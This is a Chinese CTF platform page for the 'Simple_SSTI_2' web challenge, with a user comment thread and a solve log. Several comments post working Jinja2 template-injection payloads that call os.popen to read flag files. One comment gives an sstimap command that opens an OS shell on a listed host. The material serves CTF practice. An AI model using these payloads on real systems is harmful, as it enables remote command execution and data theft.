Simple_SSTI_2WEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Tokeii
一血奖励: 3金币
解  决: 16522
提  示:
描  述:
Simple_SSTI_2
...
登录回复
评论
suxiansheng 9小时前
举报

详解参考https://mp.csdn.net/mp_blog/creation/editor/161513397

回复 0
pipizhu 13天前
举报

?flag={{lipsum.__globals__['os'].popen('cat /app/flag').read()}}获取flag

回复 0
bugku2026 1月前
举报

先通过?flag={{self.__dict__}}发现拥有lipsum,再通过?flag={{lipsum.__globals__.os.popen("cat /app/flag").read()}}获取flag

回复 1
r1ng_13 2月前
举报

焚靖直接秒,比上一个SSTI还简单

回复 0
网恋秀牛子被录屏导致自卑 5月前
举报

/?flag={{(OvO.__eq__.__globals__.sys.modules.os.popen('cat flag')).read()}}

回复 0
liutong27 8月前
举报

python3 sstimap.py -u http://117.72.52.127:12369/?flag=1 --os-shell

回复 1
wywitkey 11月前
举报

前面说的都对,这道题在ssti里比较简单,推荐使用sstimap,可以一把梭,直接出os-shell

回复 0
HK1ng 1年前
举报

详解:https://blog.csdn.net/m0_59527104/article/details/147013776

回复 4
smtall 1年前
举报

flag={{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat flag').read() }}

回复 0
hao7 1年前
举报

?flag={%for(x)in().__class__.__base__.__subclasses__()%}{%if'war'in(x).__name__ %}{{x()._module.__builtins__['__import__']('os').popen('cat flag').read()}}{%endif%}{%endfor%}

回复 1

WriteUp

image
valecalida

5 金币

立即查看

评分(15)

解题动态

gdrhdr 攻破了该题 8小时前
suxiansheng 攻破了该题 19小时前
FlyXz 攻破了该题 1天前
洋先森 攻破了该题 2天前
alden 攻破了该题 3天前
dabinzi 攻破了该题 5天前
Kakivare 攻破了该题 5天前
一一一 攻破了该题 6天前
Chartreause 攻破了该题 7天前
mbw 攻破了该题 9天前
yinlin 攻破了该题 11天前
18324056066 攻破了该题 11天前
路冥离 攻破了该题 12天前
pipizhu 攻破了该题 13天前
极品老学生 攻破了该题 16天前
kella 攻破了该题 16天前
Tomato薯条 攻破了该题 16天前
2117783710 攻破了该题 17天前
adminclc 攻破了该题 17天前
TrySec 攻破了该题 18天前
问题反馈